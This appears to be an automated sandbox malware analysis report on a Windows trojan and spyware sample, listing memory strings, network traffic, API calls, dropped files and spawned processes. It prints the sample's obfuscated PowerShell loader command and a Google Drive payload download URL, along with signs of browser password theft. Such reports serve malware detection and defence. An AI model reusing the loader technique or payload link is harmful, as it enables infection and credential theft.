Source: msiexec.exe, 0000000B.00000003.1728327752.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 0000000B.00000002.2555779773.0000000022695000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 0000000B.00000002.2555779773.0000000022695000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: msiexec.exe, 0000000B.00000002.2553419918.000000002150B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000008.00000002.1676912283.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1676912283.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1676912283.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 0000000B.00000002.2540113983.000000000598A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 0000000B.00000002.2540113983.000000000598A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/l~
Source: msiexec.exe, 0000000B.00000002.2552149792.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2540113983.000000000598A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RCW4SkvPganO7AWnA0JtNK7xu8uGwd2M
Source: msiexec.exe, 0000000B.00000003.1785131922.0000000005A24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2540113983.00000000059FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2270568666.0000000005A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 0000000B.00000003.1728327752.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1785131922.0000000005A24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2540113983.00000000059FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2540113983.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2270568666.0000000005A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1RCW4SkvPganO7AWnA0JtNK7xu8uGwd2M&export=download
Source: msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 0000000B.00000002.2555779773.0000000022695000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1676912283.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 0000000B.00000002.2553419918.00000000213CC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.000000002143B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 0000000B.00000002.2553419918.00000000213CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 0000000B.00000002.2553419918.00000000213F6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.000000002143B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 0000000B.00000003.1728327752.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 0000000B.00000002.2555779773.0000000022695000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: msiexec.exe, 0000000B.00000003.1728327752.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 0000000B.00000003.1728327752.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 0000000B.00000002.2555779773.0000000022695000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: msiexec.exe, 0000000B.00000003.1728327752.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 0000000B.00000003.1728327752.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021541000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.0000000021532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: msiexec.exe, 0000000B.00000002.2553419918.000000002153C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58083
Source: unknown	Network traffic detected: HTTP traffic on port 58085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58085
Source: unknown	Network traffic detected: HTTP traffic on port 58083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58080
Source: unknown	Network traffic detected: HTTP traffic on port 58078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58074
Source: unknown	Network traffic detected: HTTP traffic on port 58086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58070

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.6:58065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:58067 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:58086 version: TLS 1.2

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

Code function: 1_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00405582

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Supawn\Unbeholden\p7wgyD3kbI.exe

Jump to dropped file

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

Code function: 1_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_0040348F

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Code function: 1_2_00406AFA	1_2_00406AFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_07BFC0DE	8_2_07BFC0DE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120C146	11_2_2120C146
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_21205370	11_2_21205370
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120D278	11_2_2120D278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120C468	11_2_2120C468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_21206498	11_2_21206498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120C738	11_2_2120C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120E988	11_2_2120E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120CA08	11_2_2120CA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120CCD8	11_2_2120CCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120CFAA	11_2_2120CFAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_21203E09	11_2_21203E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120A088	11_2_2120A088
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_212076F1	11_2_212076F1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120F974	11_2_2120F974
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2120E97A	11_2_2120E97A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_212029EC	11_2_212029EC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_212039F0	11_2_212039F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_21209A10	11_2_21209A10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_21206FC8	11_2_21206FC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B89668	11_2_23B89668
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B89D38	11_2_23B89D38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B81FA8	11_2_23B81FA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B81F98	11_2_23B81F98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8E7D0	11_2_23B8E7D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8E7CF	11_2_23B8E7CF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8E7C0	11_2_23B8E7C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B80B30	11_2_23B80B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8DF20	11_2_23B8DF20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B80B20	11_2_23B80B20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8DF11	11_2_23B8DF11
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8E378	11_2_23B8E378
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8E377	11_2_23B8E377
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8E36A	11_2_23B8E36A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8DAB9	11_2_23B8DAB9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B82A90	11_2_23B82A90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B82A80	11_2_23B82A80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8DAC8	11_2_23B8DAC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8DAC7	11_2_23B8DAC7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8D218	11_2_23B8D218
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8D208	11_2_23B8D208
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8D670	11_2_23B8D670
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8D660	11_2_23B8D660
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8CDAF	11_2_23B8CDAF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8CDC0	11_2_23B8CDC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B85138	11_2_23B85138
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8F930	11_2_23B8F930
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8F922	11_2_23B8F922
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B85148	11_2_23B85148
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B88CB1	11_2_23B88CB1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8F080	11_2_23B8F080
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8F4D8	11_2_23B8F4D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8F4C8	11_2_23B8F4C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B88CC0	11_2_23B88CC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8EC28	11_2_23B8EC28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B8EC18	11_2_23B8EC18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B80017	11_2_23B80017
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B81850	11_2_23B81850
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B80040	11_2_23B80040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23B81841	11_2_23B81841

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nsm628F.tmp\nsExec.dll 5E66489393F159AA0FD30B630BB345D03418E9324E7D834B2E4195865A637CFE

Source: p7wgyD3kbI.exe

Static PE information: invalid certificate

Source: p7wgyD3kbI.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/30@7/5

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

1_2_0040348F

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

Code function: 1_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_00404822

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

Code function: 1_2_004021A2 CoCreateInstance,

1_2_004021A2

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

File created: C:\Users\user\Pictures\downtreading

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

File created: C:\Users\user\AppData\Local\Temp\nsv535B.tmp

Jump to behavior

Source: p7wgyD3kbI.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021614000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.00000000215D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.0000000021621000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.00000000215E0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.00000000215EF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: p7wgyD3kbI.exe	Virustotal: Detection: 69%
Source: p7wgyD3kbI.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

File read: C:\Users\user\Desktop\p7wgyD3kbI.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\p7wgyD3kbI.exe "C:\Users\user\Desktop\p7wgyD3kbI.exe"
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Vrimlenes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\udrring.Pro';$Pilleriet=$Vrimlenes.SubString(52498,3);.$Pilleriet($Vrimlenes)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Vrimlenes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\udrring.Pro';$Pilleriet=$Vrimlenes.SubString(52498,3);.$Pilleriet($Vrimlenes)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
